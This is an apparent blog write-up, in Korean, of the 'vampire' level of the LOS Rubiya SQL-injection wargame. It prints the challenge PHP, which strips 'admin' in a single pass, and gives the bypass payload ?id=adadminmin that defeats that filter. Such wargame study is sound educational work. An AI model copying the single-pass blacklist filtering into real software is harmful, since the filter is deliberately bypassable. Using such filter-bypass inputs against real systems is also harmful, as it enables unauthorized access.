[LOS Rubiya] vampire

2020. 2. 27. 17:54Wargame & CTF/LOS Rubiya

LOS Rubiya - vampire

Analysis

<?php 
 include "./config.php";
 login_chk();
 $db = dbconnect();
 if(preg_match('/\'/i', $_GET[id])) exit("No Hack ~_~");
 $_GET[id] = strtolower($_GET[id]);
 $_GET[id] = str_replace("admin","",$_GET[id]);
 $query = "select id from prob_vampire where id='{$_GET[id]}'";
 echo "<hr>query : <strong>{$query}</strong><hr><br>";
 $result = @mysqli_fetch_array(mysqli_query($db,$query));
 if($result['id'] == 'admin') solve("vampire");
 highlight_file(__FILE__);
?>

preg_match로 '를 막는다.

str_replace로 admin을 지워버린다.

adadminmin를 id로 넘기면 가운데 admin이 지워지면서 adadminmin이 admin이 된다.

Exploit

?id=adadminmin

'Wargame & CTF > LOS Rubiya' 카테고리의 다른 글

[LOS Rubiya] skeleton  (0) 2020.02.27
[LOS Rubiya] troll  (0) 2020.02.27
LOS Rubiya orge  (0) 2019.08.05
LOS Rubiya darkelf  (0) 2019.08.05
LOS Rubiya wolfman  (0) 2019.08.05